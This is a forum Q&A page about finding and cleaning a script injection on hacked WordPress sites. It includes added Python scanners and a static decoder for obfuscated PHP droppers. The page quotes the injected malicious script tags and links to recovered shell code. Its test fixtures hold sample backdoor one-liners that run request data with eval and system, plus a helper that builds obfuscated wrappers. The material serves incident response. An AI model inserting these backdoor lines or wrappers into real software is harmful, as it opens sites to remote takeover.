Just noticed ads appearing on one of our Wordpress sites. Nailed it down to these scripts being injected into the top of every page:
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
Been looking at all the files and database for hours and can't figure out what is injecting it or how it got there.
What we found so far:
Some random lines in the function.php that were handling posts / gets. We removed those but that didn't seem to solve the issue.
We found a wordpress user that no one has apparently created. So we removed that.
Reset all passwords on wordpress and FTP access
When we load a copy of the site on our local setup it doesn't display the ads or load the scripts... Almost like it can detect / target the live site?
But we still can't find where or how the script is being injected.
Any help greatly appreciated.
Someone had a similar issue here but unfortunately removed their post, so only the cached copy remains:
http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:stackoverflow.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au
The same thing happened to a client of mine in the last 24 hours or so.
Can you share some information about the plugins you use and wordpress version?
The file influencing this is wp-admin/setup-config.php. It has encrypted bash code. I also found two admin users generated in wp_users. I think it's obvious that it's an automated attack, but it's pretty sophisticated.
I found the code on some random website via google search. You can review it here: http://tmp.mongit.com/tools/core.txt - It seems to be a shell file, but I'm not really smart when it comes to websec.
On my client's server I also found crap in a root /tmp/ folder (cPanel) that was being somehow accessed by wp_redirect (referenced in pluggable.php line 1196). These files are holding some MySQL info and WP database queries in JSON format. Not really sure how and why these files exist.
[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196
Try to narrow down the injection source.
Disable plugins one at a time
Switch to a different theme
Check .htaccess files
Test against server generated injections
Test against browser generated injections
Had the same issue a few hours ago.
Finally found it in the first line of the root WordPress "index.php": an injected script call. The script calls a file in the same directory whose name starts with .xxxxx, like .htaccess, so it's hidden, for example in TCMD.
Cleared the line and deleted the file, now all OK.
But how the hell somebody could control index.php I don't know....
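As an added example (not code from any poster in this thread), here is a small Python triage script that applies the indicators described above to a WordPress docroot in one pass: eval() wrapped around gzinflate/base64_decode, eval() of request data (the kind of lines the original poster found in the theme's functions.php), an include/require of a hidden dotfile from index.php, a dotfile in the tree that contains PHP, and the two script hosts quoted in the injected tag. It builds a constructed sample tree under a temporary directory so it runs offline; the file name .xd3f9a.php, the theme name "demo" and all file contents are invented. Point scan_wordpress_tree() at a real docroot to use it.

```python
import os
import re
import tempfile

# Indicator rules. The two hostnames are taken from the script tag quoted in the
# original post; the other patterns are generic for PHP droppers and backdoors.
RULES = [
    ("eval over decoder chain",
     re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(")),
    ("eval of request data",
     re.compile(r"eval\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")),
    ("include of hidden dotfile",
     re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*['\"/]\.[A-Za-z0-9_]")),
    ("script host reported in this thread",
     re.compile(r"mde86\.org|js\.users\.51\.la")),
]
# Dotfiles that legitimately live in a WordPress docroot; any other dotfile
# that contains PHP is suspect (the poster's index.php called one of these).
BENIGN_DOTFILES = {".htaccess", ".htpasswd", ".user.ini"}
PHP_MARKER = re.compile(r"<\?php|\beval\s*\(")


def scan_file(path):
    """Return the list of indicator names that fire on one file."""
    with open(path, "r", encoding="latin-1") as fh:
        text = fh.read()
    reasons = [name for name, rx in RULES if rx.search(text)]
    base = os.path.basename(path)
    if base.startswith(".") and base not in BENIGN_DOTFILES and PHP_MARKER.search(text):
        reasons.append("hidden file containing PHP")
    return reasons


def scan_wordpress_tree(root):
    """Walk a docroot and return sorted (relative_path, [reasons]) for flagged files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reasons = scan_file(full)
            if reasons:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, reasons))
    return sorted(findings)


# Constructed sample tree: three clean files and four files carrying the
# indicators described in the thread. Names and contents are invented.
SAMPLE_FILES = {
    ".htaccess": "RewriteEngine On\nRewriteRule . /index.php [L]\n",
    "wp-config.php": "<?php\ndefine('DB_NAME', 'wp');\nrequire_once(ABSPATH . 'wp-settings.php');\n",
    "wp-includes/pluggable.php": "<?php\nrequire_once( ABSPATH . WPINC . '/class-phpass.php' );\n",
    # first-line injection that pulls in a hidden dotfile next to index.php
    "index.php": "<?php\n@include(dirname(__FILE__) . '/.xd3f9a.php');\n"
                 "define('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n",
    # the hidden dropper itself (the base64 body is a placeholder, not a real payload)
    ".xd3f9a.php": "<?php eval(gzinflate(base64_decode('H4sIAAAAAAAAA'))); ?>\n",
    # backdoor line of the kind the poster found in the theme's functions.php
    "wp-content/themes/demo/functions.php":
        "<?php\nif (isset($_REQUEST['p'])) { eval($_REQUEST['p']); }\n",
    # the injected tag quoted in the post, dropped into the theme header
    "wp-content/themes/demo/header.php":
        '<script language="javascript" type="text/javascript" '
        'src="http://www.mde86.org/jquery.min.Js"></script>\n<?php wp_head(); ?>\n',
}


def build_sample_tree():
    """Write SAMPLE_FILES under a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="latin-1") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    docroot = build_sample_tree()
    for rel, reasons in scan_wordpress_tree(docroot):
        print("%-45s %s" % (rel, "; ".join(reasons)))
```

Anything this flags is a starting point for manual review, not proof of compromise: legitimate plugins occasionally use base64_decode, and the host list is only what this thread reported. Run it against a clean copy of the same WordPress version as well, and diff the two result sets.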
Related
I am trying to import the demo content of a premium theme, but it gets stuck every time and gives an error in the console (admin-ajax.php 404 (Not Found)).
Without more information it's hard to say what's going wrong.
admin-ajax.php is a core file; the first step is to check that it's in your installation.
The file should be at /wp-admin/admin-ajax.php on your server.
File rights should be set to 664.
Second step to isolate the problem is to disable all unnecessary plugins.
Maybe a poor coded Plugin causes a javascript conflict.
Put this in your /wp-config.php file.
define('CONCATENATE_SCRIPTS', false );
It will cause the backend JavaScript files to load separately.
Maybe you will get more information which script is causing the error.
Some cheap hosters block access to this file.
Contact your Hoster and make sure they do not block the access for security reasons.
Hope this helps.
I am re-designing someone's WordPress website and mostly need to change the CSS. I wanted to move the entire website over to my server in order to develop it. Mostly I am just changing the design/CSS, but there are some custom parts I want to keep, such as a testimonial plug-in/widget that has a custom place in the dashboard and a way to post testimonials.
I downloaded the entire site.
Exported the database
And then moved it to my server and uploaded the files and created a new database and imported it.
Then I used this to change the database to the correct directory:
https://interconnectit.com/products/search-and-replace-for-wordpress-databases/
Now I am getting a crazy error:
Warning: Cannot modify header information - headers already sent by (output started at /home//public_html/wordpress/wp-config.php:156) in /home/public_html/wordpress/wp-content/plugins/wp-greet-box/includes/wp-greet-box.class.php on line 493
Warning: Cannot modify header information - headers already sent by (output started at /home/llhimhi1/public_html/wordpress/wp-config.php:156) in /home/l/public_html/a/wordpress/wp-includes/pluggable.php on line 1121
I don't know if I should continue trying to make this work, or just copy the theme to a fresh install. But I am not sure what else to copy since there are custom plugins and stuff in the dashboard.
Help would be much appreciated.
A "headers already sent" error is a very common PHP error having to do with white space or junk characters in a file, or a file that was corrupted during FTP transfer. Check your wp-config.php file.
From FAQ Troubleshooting » Headers already sent warning « WordPress Codex
It is usually because there are spaces, new lines, or other stuff before an opening tag, typically in wp-config.php. This could be true about some other file too, so please check the error message, as it will list the specific file name where the error occurred (see "Interpreting the Error Message" below).
Replacing the faulty file with one from your most recent backup or one from a fresh WordPress download is your best bet, but if neither of those are an option, please follow the steps (at the link above).
And read http://codex.wordpress.org/Debugging_in_WordPress on how to set up debugging to find causes of "white pages" and other PHP errors.
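As an added example (not from the answer above or from the Codex), a Python checker that does what the Codex text describes by hand: it reports any bytes ahead of the first `<?php` (a UTF-8 BOM or blank lines, the usual FTP-transfer damage) and any bytes after the last `?>` beyond the single newline PHP swallows, which is exactly the output that triggers "headers already sent". The sample wp-config.php variants are constructed. Note that when the warning points at "eval()'d code" rather than a file offset, as in the compromised-site thread earlier on this page, whitespace is not the cause and the eval'd file is what to look at.

```python
OPEN_TAG = b"<?php"
CLOSE_TAG = b"?>"
BOM = b"\xef\xbb\xbf"


def leading_junk(data):
    """Bytes PHP will send to the browser before the first <?php is reached."""
    idx = data.find(OPEN_TAG)
    return data if idx < 0 else data[:idx]


def trailing_junk(data):
    """Bytes sent after the last ?> (PHP swallows exactly one newline following ?>)."""
    idx = data.rfind(CLOSE_TAG)
    if idx < 0:
        return b""
    tail = data[idx + len(CLOSE_TAG):]
    if tail.startswith(b"\r\n"):
        return tail[2:]
    if tail.startswith(b"\n"):
        return tail[1:]
    return tail


def diagnose(data):
    """List the reasons a file would trigger 'headers already sent'; empty means clean."""
    problems = []
    lead = leading_junk(data)
    if lead.startswith(BOM):
        problems.append("UTF-8 BOM before <?php")
    elif lead:
        problems.append("%d byte(s) before <?php: %r" % (len(lead), lead[:40]))
    tail = trailing_junk(data)
    if tail:
        problems.append("%d byte(s) after closing ?>: %r" % (len(tail), tail[:40]))
    return problems


def diagnose_file(path):
    """Run diagnose() on a file read in binary mode so the BOM is not hidden."""
    with open(path, "rb") as fh:
        return diagnose(fh.read())


# Constructed samples standing in for wp-config.php variants (not real files).
CLEAN = b"<?php\ndefine('DB_NAME', 'wp');\nrequire_once(ABSPATH . 'wp-settings.php');\n"
WITH_BOM = BOM + CLEAN            # editor saved the file as "UTF-8 with BOM"
LEADING_BLANK = b"\r\n" + CLEAN   # blank line pasted above the opening tag
TRAILING_BLANK = CLEAN + b"?>\n\n"  # closing tag followed by an extra blank line

if __name__ == "__main__":
    for label, sample in [("clean", CLEAN), ("bom", WITH_BOM),
                          ("leading", LEADING_BLANK), ("trailing", TRAILING_BLANK)]:
        print(label, diagnose(sample) or ["ok"])
```

The fix in every flagged case is the same: open the file in an editor that shows the BOM and invisible characters, delete everything before `<?php`, and either remove the closing `?>` (WordPress core files omit it for this reason) or make sure nothing follows it.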
This morning I logged onto my website and, shockingly, found that it just spat out error messages and some kind of upload form was displayed. A form that basically uploads a file onto my server.
I logged into my server and had a look at the access log. It seems he accessed the function file of my wordpress theme, fully deleted the original and created an upload form out of it.
With that upload form he then uploaded the following file.
Edit: I had to copy the code to hastebin, it was too big to be posted here.
http://hastebin.com/itedinefiz.php
He named the file web-info.php. I did not run the file because I am afraid that it might do some harmful things to my site.
Could anyone tell me what this file does?
Anyway, I have restored the functions.php file of my WordPress theme and deleted that web-info.php file from the server, and now it seems that the website is running again.
Oh and my guess he gained access to my website because my login credentials were very easy... very stupid of me :(
After doing a bit research this what I came up with.
The malicious file that I have posted above, was encoded using eval(gzinflate(base64_decode));
Thanks to http://ddecode.com/phpdecoder/ I was able to decoded it, here is the raw PHP file that the hacker left behind:
http://pastebin.com/fAEQn2j7
I ran the file on my local machine, holy crap! It's a full-on rootkit. It has a massive interface that covers pretty much anything needed to take over the entire server. It seems to let you browse all the files on the server, run SQL code, run PHP code, brute-force options, network options and so on.
I think the safest is to cancel the entire VPS that I am renting from Bluehost; a normal WordPress deinstallation won't do any good.
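As an added example (not the poster's file or the ddecode.com service), here is a static Python unwrapper for the eval(gzinflate(base64_decode(...))) pattern the poster described, which decodes the layers without ever executing the PHP. It also handles gzuncompress and str_rot13 in the same eval() chain, since those appear in the same family of droppers, and lists the dangerous calls left in the final stage. The two-layer sample file and its one-line command backdoor are constructed here for the demonstration.

```python
import base64
import codecs
import re
import zlib

# eval(f1(f2(...('literal')...))) -- captures the function chain and the string literal.
EVAL_RE = re.compile(
    r"eval\s*\(\s*((?:[A-Za-z0-9_]+\s*\(\s*)+)(['\"])(.*?)\2\s*\)+\s*;?",
    re.DOTALL,
)
DANGEROUS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open",
             "assert", "move_uploaded_file", "mysql_query", "mysqli_query")


def _apply(func, data):
    """Apply one PHP decoder function to bytes, without running any PHP."""
    if func == "base64_decode":
        return base64.b64decode(data)
    if func == "gzinflate":              # PHP gzinflate() = raw DEFLATE stream
        return zlib.decompress(data, -zlib.MAX_WBITS)
    if func == "gzuncompress":           # PHP gzuncompress() = zlib-wrapped stream
        return zlib.decompress(data)
    if func == "str_rot13":
        return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")
    raise ValueError("unsupported decoder function: %s" % func)


def unwrap_once(src):
    """Strip one eval(...) wrapper; return the decoded PHP, or None if there is none."""
    m = EVAL_RE.search(src)
    if not m:
        return None
    chain = re.findall(r"[A-Za-z0-9_]+", m.group(1))   # outermost function first
    data = m.group(3).encode("latin-1")
    for func in reversed(chain):                      # PHP evaluates the innermost first
        data = _apply(func, data)
    return data.decode("latin-1")


def decode_layers(src, max_layers=32):
    """Peel nested eval() wrappers; returns every stage, the last one being plain PHP."""
    layers = [src]
    while len(layers) <= max_layers:
        nxt = unwrap_once(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def suspicious_calls(php):
    """Names from DANGEROUS that appear as calls in a decoded stage."""
    return sorted(f for f in DANGEROUS if re.search(r"\b%s\s*\(" % f, php))


def pack_layer(php):
    """Build one eval(gzinflate(base64_decode(...))) wrapper, the way droppers do (sample only)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = c.compress(php.encode("latin-1")) + c.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode("ascii")


# Constructed sample: a two-layer wrapper around a one-line command backdoor.
FINAL_STAGE = "if (isset($_POST['cmd'])) { system($_POST['cmd']); }"
SAMPLE_FILE = "<?php\n" + pack_layer(pack_layer(FINAL_STAGE)) + "\n?>\n"

if __name__ == "__main__":
    stages = decode_layers(SAMPLE_FILE)
    print("layers peeled:", len(stages) - 1)
    print("final stage:", stages[-1])
    print("dangerous calls:", suspicious_calls(stages[-1]))
```

Decoding statically is the point: the poster's instinct not to run the file was right, and pasting it into a web decoder ships a possibly unique sample to a third party. Real droppers sometimes concatenate strings or use variable function names to defeat a regex like this one; when unwrap_once() returns None on something that is clearly still obfuscated, inspect the chain by hand rather than executing it.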
I updated my checkout page by updating mostly the file which was in ....wp-ecommerce/wpsc-theme/wpsc-shopping_cart_page.php
It worked fine for a while, but now some of the changed states reverted to the previous state. Actually, I can even delete the file that I mentioned above, so it means wordpress is loading this file from somewhere else. Any ideas from where and what had happened? Thanks for your help.
Although I don't have a specific answer to your question, if you use an IDE (like Dreamweaver or Eclipse) you could grab a copy of your sites code to your local PC and do a code search for something that is unique to that page.
Ie, if there is a <div class="a_unique_div"> tag somewhere on that page and you know it's only visible on that page, search the code for that and it may give you a clue what file is being used for the output. Even if it's only used on 1 or 2 pages it may bring you closer to working it out.
Alternatively, if you have SSH access you could try and "grep" for the code by SSHing into your server and running a command like:
grep -i -R '<div class="a_unique_div">' /www/your_wp_folder/
(where /www/your_wp_folder/ is the path to your WordPress installation)
Though for this you'll need SSH access, grep installed on the server, etc, so it may not be a viable option.
Good luck!
I'm trying to implement an upload with progress bar code I found here. But when I run my example code I get the following error in IIS7 on Windows 7:
I tried messing with my handlers but only messed it up more as i don't know what i'm doing. Can someone help me get this working?
It appears that you are trying to upload the file to (or trying to get progress updates from) an HTML file (fileupload.html). HTML files are treated as static files by IIS, so you can only issue GET requests against them (there is no point in submitting a POST to a static file, because the content is not going to change based on POST data), and hence the error.
Perhaps you have done the integration incorrectly or may be using the wrong plugin (the author is talking about using it in conjunction with an Apache module). You may want to look at alternatives from the links below:
http://mattberseth.com/blog/2008/07/aspnet_file_upload_with_realti.html
File Upload with progress bar in Asp.Net Mvc/ jQuery?